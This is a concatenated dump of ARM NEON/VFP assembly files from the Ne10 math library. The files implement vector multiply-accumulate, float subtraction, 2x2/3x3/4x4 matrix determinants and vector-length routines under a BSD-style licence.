@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r5 = count; r13 is the stack pointer (sp)
and r5, r4, #3 @ r5 = count % 4;
sub r4, r4, r5 @ count = count - r4; This is what's left to be processed after this loop
cbz r4, .L_check_vec2
@ load the 1st set of values
vld2.32 {q0-q1}, [r2]!
vld2.32 {q2-q3}, [r3]!
vld2.32 {q8-q9}, [r1]!
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q8, q0, q2
vmla.f32 q9, q1, q3
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ load the 2nd set of values
vld2.32 {q0-q1}, [r2]!
vld2.32 {q2-q3}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst2.32 {d16,d17,d18,d19}, [r0]!
@ load the next (e.g. 2nd) set of values
vld2.32 {q8-q9}, [r1]!
subs r4, r4, #4
@ calculate values for the 2nd set
vmla.f32 q8, q0, q2
vmla.f32 q9, q1, q3
bgt .L_mainloop_vec2 @ loop if r3 is > r4, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ store the result for the last set of values
vst2.32 {d16,d17,d18,d19}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array
vld1.f32 d0, [r2]!
vld1.f32 d1, [r3]!
vld1.f32 d2, [r1]!
subs r5, r5, #1
@ calculate values
vmla.f32 d2, d0, d1
vst1.32 {d2}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return
pop {r4, r5}
mov r0, #0
bx lr
.align 2
.global ne10_vmla_vec3f_neon
.thumb
.thumb_func
ne10_vmla_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_vmla_vec3f(arm_vec3f_t * dst,
@ arm_vec3f_t * acc,
@ arm_vec3f_t * src1,
@ arm_vec3f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *acc & current acc entry's address
@ r2: *src1 & current src1 entry's address
@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r4 = count; r13 is the stack pointer (sp)
and r5, r4, #3 @ r4 = count % 4;
sub r4, r4, r5 @ count = count - r4; This is what's left to be processed after this loop
cmp r4, #0
beq .L_check_vec3
@ load the 1st set of values
vld3.32 {d0, d2, d4}, [r2]!
vld3.32 {d1, d3, d5}, [r2]!
vld3.32 {d18, d20, d22}, [r3]!
vld3.32 {d19, d21, d23}, [r3]!
vld3.32 {d24, d26, d28}, [r1]! @ part of q12, q13, and q14
vld3.32 {d25, d27, d29}, [r1]! @ part of q12, q13, and q14
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q12, q0, q9
vmla.f32 q13, q1, q10
vmla.f32 q14, q2, q11
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ load the next (e.g. 2nd) set of values
vld3.32 {d0, d2, d4}, [r2]!
vld3.32 {d1, d3, d5}, [r2]!
vld3.32 {d18, d20, d22}, [r3]!
vld3.32 {d19, d21, d23}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
@ finish loading ...
vld3.32 {d24, d26, d28}, [r1]! @ part of q12, q13, and q14
vld3.32 {d25, d27, d29}, [r1]! @ part of q12, q13, and q14
subs r4, r4, #4
@ calculate values for the next (e.g. 2nd) set
vmla.f32 q12, q0, q9
vmla.f32 q13, q1, q10
vmla.f32 q14, q2, q11
bgt .L_mainloop_vec3 @ loop if r3 is > r4, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ store the result for the last set of value
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array
vld3.f32 {d0[0], d2[0], d4[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r3]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
vld3.f32 {d18[0], d20[0], d22[0]}, [r1]! @ The values are loaded like so:
@ q9 = { acc.x, -, -, - };
@ q10 = { acc.y, -, -, - };
@ q11 = { acc.z, -, -, - };
subs r5, r5, #1
@ calculate values for
vmla.f32 d18, d0, d1
vmla.f32 d20, d2, d3
vmla.f32 d22, d4, d5
vst3.32 {d18[0], d20[0], d22[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return
pop {r4, r5}
mov r0, #0
bx lr
.align 2
.global ne10_vmla_vec4f_neon
.thumb
.thumb_func
ne10_vmla_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_vmla_vec4f(arm_vec4f_t * dst,
@ arm_vec4f_t * acc,
@ arm_vec4f_t * src1,
@ arm_vec4f_t * src2,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *acc & current acc entry's address
@ r2: *src1 & current src1 entry's address
@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@ the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r4 = count; r13 is the stack pointer (sp)
and r5, r4, #3 @ r5 = count % 4;
sub r4, r4, r5 @ count = count - r5; This is what's left to be processed after this loop
cmp r4, #0
beq .L_check_vec4
@ load the 1st set of values
vld4.32 {d0, d2, d4, d6}, [r2]!
vld4.32 {d1, d3, d5, d7}, [r2]!
vld4.32 {d16, d18, d20, d22}, [r3]!
vld4.32 {d17, d19, d21, d23}, [r3]!
vld4.32 {d24, d26, d28, d30}, [r1]! @ part of q12, q13, q14, and q15
vld4.32 {d25, d27, d29, d31}, [r1]! @ part of q12, q13, q14, and q15
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q12, q0, q8
vmla.f32 q13, q1, q9
vmla.f32 q14, q2, q10
vmla.f32 q15, q3, q11
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ load the next (e.g. 2nd) set of values
vld4.32 {d0, d2, d4, d6}, [r2]!
vld4.32 {d1, d3, d5, d7}, [r2]!
vld4.32 {d16, d18, d20, d22}, [r3]!
vld4.32 {d17, d19, d21, d23}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
@ finish loading ....
vld4.32 {d24, d26, d28, d30}, [r1]! @ part of q12, q13, q14, and q15
vld4.32 {d25, d27, d29, d31}, [r1]! @ part of q12, q13, q14, and q15
subs r4, r4, #4
@ calculate values for the next (e.g. 2nd) set
vmla.f32 q12, q0, q8
vmla.f32 q13, q1, q9
vmla.f32 q14, q2, q10
vmla.f32 q15, q3, q11
bgt .L_mainloop_vec4 @ loop if r3 is > r4, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ store the result for the last set of values
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array
vld4.f32 {d0[0], d2[0], d4[0], d6[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
@ q3 = { V1.w, -, -, - };
vld4.f32 {d1[0], d3[0], d5[0], d7[0]}, [r3]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
@ q3 = { V1.w, -, V2.w, - };
vld4.f32 {d24[0], d26[0], d28[0], d30[0]}, [r1]! @ The values are loaded like so:
@ q12 = { acc.x, -, -, - };
@ q13 = { acc.y, -, -, - };
@ q14 = { acc.z, -, -, - };
@ q15 = { acc.w, -, -, - };
subs r5, r5, #1
@ calculate values
vmla.f32 d24, d0, d1
vmla.f32 d26, d2, d3
vmla.f32 d28, d4, d5
vmla.f32 d30, d6, d7
vst4.32 {d24[0], d26[0], d28[0], d30[0]}, [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return
pop {r4, r5}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_sub.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_sub.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_sub_float_asm
.thumb
.thumb_func
ne10_sub_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_float(arm_vec2f_t * dst,
@ arm_float_t * src1, const arm_float_t * src2,
@ unsigned int count)
@
@ r0: *dst & current src1 entry's address - made of base(r0)+offset(r5)
@ r1: *src1 & current src1 entry's address - made of base(r1)+offset(r5)
@ r2: *src2 & current src2 entry's address - made of base(r2)+offset(r5)
@ r3: int count
@
@ r3: loop counter
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat
.LoopBeginFloat:
vldr s1, [r1] @ Load s1 = src1[i]
add r1, r1, #4 @ move to the next entry
vldr s2, [r2] @ Load s2 = src2[i]
add r2, r2, #4 @ next entry
vsub.f32 s10, s1, s2 @ s10 = src1[i] - src2[i]
vstr s10, [r0] @ Store the result back into the main memory
add r0, r0, #4 @ next entry in the dst
subs r3, r3, #1 @ count down using the current index (i--)
bne .LoopBeginFloat @ Continue if "i < count"
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 11,419 | modules/math/NE10_detmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_detmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.include "NE10_detmat.neon.inc.s"
.align 4
.global ne10_detmat_2x2f_neon
.thumb
.thumb_func
ne10_detmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_detmat_2x2f(arm_float_t * dst,
@ arm_mat2x2f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 matrices
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r2; This is what's left to be processed after this loop
cbz r2, .L_check_mat2x2
@ We load four 2x2 matrices each time, calculate their
@ determinants, store the results in the destination
@ memory address, and move onto the next four.
@ load the 1st set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate values for current set
vmul.f32 q15, q0, q3
vmls.f32 q15, q1, q2
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for current set
vst1.32 {q15}, [r0]!
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate values for next set
vmul.f32 q15, q0, q3
vmls.f32 q15, q1, q2
bgt .L_mainloop_mat2x2 @ loop if r2 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {q15}, [r0]!
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array
vld1.32 {d0, d1}, [r1]! @ Load matrix [A]
subs r3, r3, #1
@ calculate det([A]) = |A|
vrev64.32 d1, d1
vmul.f32 d2, d0, d1
vrev64.32 d2, d2
vmls.f32 d2, d0, d1 @ At this point d2 = { -|A|, |A| }
@ store the result which is in d2[1]
vst1.32 {d2[1]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return
mov r0, #0
bx lr
.align 4
.global ne10_detmat_3x3f_neon
.thumb
.thumb_func
ne10_detmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_detmat_3x3f(arm_float_t * dst,
@ arm_mat3x3f_t * src,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 matrices
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r2 = count % 4;
sub r2, r2, r3 @ count = count - r2; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat3x3
@ We load two 3x3 matrices each time, calculate their
@ determinants, store the results in the destination
@ memory address, and move onto the next two.
@ load the 1st set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d16, d17, d18, d19, d20, d21, q0, q1, q2, q8, q9, q10, r1
subs r2, r2, #2
@ calculate values for the current set
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d16, d18, d20, d1, d3, d5, d22, d24, d26
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result for the current set
vst1.32 {d22}, [r0]!
@ load the next set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d16, d17, d18, d19, d20, d21, q0, q1, q2, q8, q9, q10, r1
subs r2, r2, #2
@ calculate values for the next set
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d16, d18, d20, d1, d3, d5, d22, d24, d26
bgt .L_mainloop_mat3x3 @ loop if r2 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {d22}, [r0]!
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array
@ load the next (e.g. 3rd) set of values
vld3.32 { d0[0], d2[0], d4[0]}, [r1]!
vld3.32 { d1[0], d3[0], d5[0]}, [r1]!
vld3.32 {d16[0], d18[0], d20[0]}, [r1]!
subs r3, r3, #1
@ calculate values for the last (e.g. 3rd) set
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d1, d3, d5, d16, d18, d20, d22, d24, d26
@ store the result for the last (e.g. 3rd) set
vst1.32 {d22[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return
mov r0, #0
bx lr
.align 4
.global ne10_detmat_4x4f_neon
.thumb
.thumb_func
ne10_detmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_detmat_float(arm_float_t * dst,
@ arm_mat4x4f_t * src1,
@ unsigned int count)
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@ processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@ of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat4x4
@ We load two 4x4 matrices each time, calculate their
@ determinants, store the results in the destination
@ memory address, and move onto the next two.
@ load the 1st set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d16, d17, d18, d19, d20, d21, d22, d23, q0, q1, q2, q3, q8, q9, q10, q11, r1
subs r2, r2, #2
@ calculate values for the current set
GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d16, d18, d20, d22, d1, d3, d5, d7, d17, d19, d21, d23, d24, d26, d28, d30, d25, d27
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result for the current set
vst1.32 {d24}, [r0]!
@ load the next set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d16, d17, d18, d19, d20, d21, d22, d23, q0, q1, q2, q3, q8, q9, q10, q11, r1
subs r2, r2, #2
@ calculate values for the next set
GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d16, d18, d20, d22, d1, d3, d5, d7, d17, d19, d21, d23, d24, d26, d28, d30, d25, d27
bgt .L_mainloop_mat4x4 @ loop if xx is > r2, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {d24}, [r0]!
.L_check_mat4x4:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last few items left in the input array
vld4.32 { d0[0], d2[0], d4[0], d6[0]}, [r1]!
vld4.32 { d1[0], d3[0], d5[0], d7[0]}, [r1]!
vld4.32 { d16[0], d18[0], d20[0], d22[0]}, [r1]!
vld4.32 { d17[0], d19[0], d21[0], d23[0]}, [r1]!
subs r3, r3, #1
@ calculate values
GET_DETERMINANT_of_4x4MATS_ARGS d0, d2, d4, d6, d1, d3, d5, d7, d16, d18, d20, d22, d17, d19, d21, d23, d24, d26, d28, d30, d25, d27
@ store the results
vst1.32 {d24[0]}, [r0]!
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 5,984 | modules/math/NE10_len.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_len.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_len_vec2f_asm
.thumb
.thumb_func
ne10_len_vec2f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec2f(arm_float_t * dst,
@ arm_vec2f_t * src, unsigned int count)
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec2F
add r0, r0, r2, lsl #2
add r1, r1, r2, lsl #3 @ r1 = r1 + count * 8
.LoopBeginVec2F:
vldmdb r1!, {s10-s11}
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vstmdb r0!, {s15} @ store s15 in dst[ i ]=s15 and move dst to the next entry (4 bytes)
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec2F @ loop if r4 is still positive or zero
.LoopEndVec2F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_len_vec3f_asm
.thumb
.thumb_func
ne10_len_vec3f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec3f(arm_float_t * dst,
@ arm_vec3f_t * src, unsigned int count)
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec3F
add r0, r0, r2, lsl #2
add r1, r1, r2, lsl #3 @ ...
add r1, r1, r2, lsl #2 @ r1 = r1 + count * 12
.LoopBeginVec3F:
vldmdb r1!, {s10-s12}
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vstmdb r0!, {s15} @ store s15 in dst[ i ]=s15 and move dst to the next entry (4 bytes)
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec3F @ loop if r4 is still positive or zero
.LoopEndVec3F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
.balign 4
.global ne10_len_vec4f_asm
.thumb
.thumb_func
ne10_len_vec4f_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_len_vec4f(arm_float_t * dst,
@ arm_vec4f_t * src, unsigned int count)
@
@ r0: *dst and current destination item's address
@ r1: *src and current source item's address
@ r2: int count
@
@ r2: loop counter
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r2, .LoopEndVec4F
add r0, r0, r2, lsl #2
add r1, r1, r2, lsl #4 @ r1 = r1 + count * 16
.LoopBeginVec4F:
vldmdb r1!, {s10-s13}
vmul.f32 s14, s10, s10 @ s14 = x*x
vmla.f32 s14, s11, s11 @ s14 = x*x + y*y
vmla.f32 s14, s12, s12 @ s14 = x*x + y*y + z*z
vmla.f32 s14, s13, s13 @ s14 = x*x + y*y + z*z + w*w
vsqrt.f32 s15, s14 @ s15 = sqrt( s14 )
vstmdb r0!, {s15} @ store s15 in dst[ i ]=s15 and move dst to the next entry (4 bytes)
subs r2, r2, #1 @ decrement the loop counter
bne .LoopBeginVec4F @ loop if r4 is still positive or zero
.LoopEndVec4F:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 14,550 | modules/math/NE10_div.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_div.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.align 4
.global ne10_div_float_neon
.thumb
.thumb_func
ne10_div_float_neon:
